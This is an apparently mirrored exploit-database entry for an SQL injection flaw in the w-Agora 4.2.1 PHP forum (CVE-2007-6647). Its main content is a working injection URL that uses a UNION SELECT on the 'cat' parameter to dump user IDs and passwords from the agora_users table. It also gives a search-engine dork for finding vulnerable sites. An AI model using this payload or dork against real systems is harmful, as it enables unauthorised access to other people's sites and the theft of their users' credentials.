[] NeoSense
E X P L O I T S
title author type platform port cve id

w-Agora 4.2.1 - 'cat' SQL Injection

Author: IHTeam
type: webapps
platform: php
port: 
date_added: 2007-12-29 
date_updated: 2016-11-08 
verified: 1 
codes: OSVDB-39883;CVE-2007-6647 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comw-agora-4.2.1-php.zip
#########################################################################################
#
#         [W-Agora <= 4.2.1]
#
# Class:     SQL Injection  # Found:     30/12/2007 # Remote:    Yes  # Site:      http://w-agora.net
# Download:  http://sourceforge.net/project/showfiles.php?group_id=3413
#   #########################################################################################

        Exploit :
===================================================================================================================================================================================================================
http://site.com/[w-agora_path]/index.php?site=[site_name]&cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat(userid,0x3a,password),24/**/FROM/**/agora_users/*
===================================================================================================================================================================================================================


        Thanks To:
=========================
All ihteam.net members;
=========================

DORK: allinurl:"index.php?site=" "W-Agora"

#ihteam.net - Inclusion Hunter Team

# milw0rm.com [2007-12-30]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.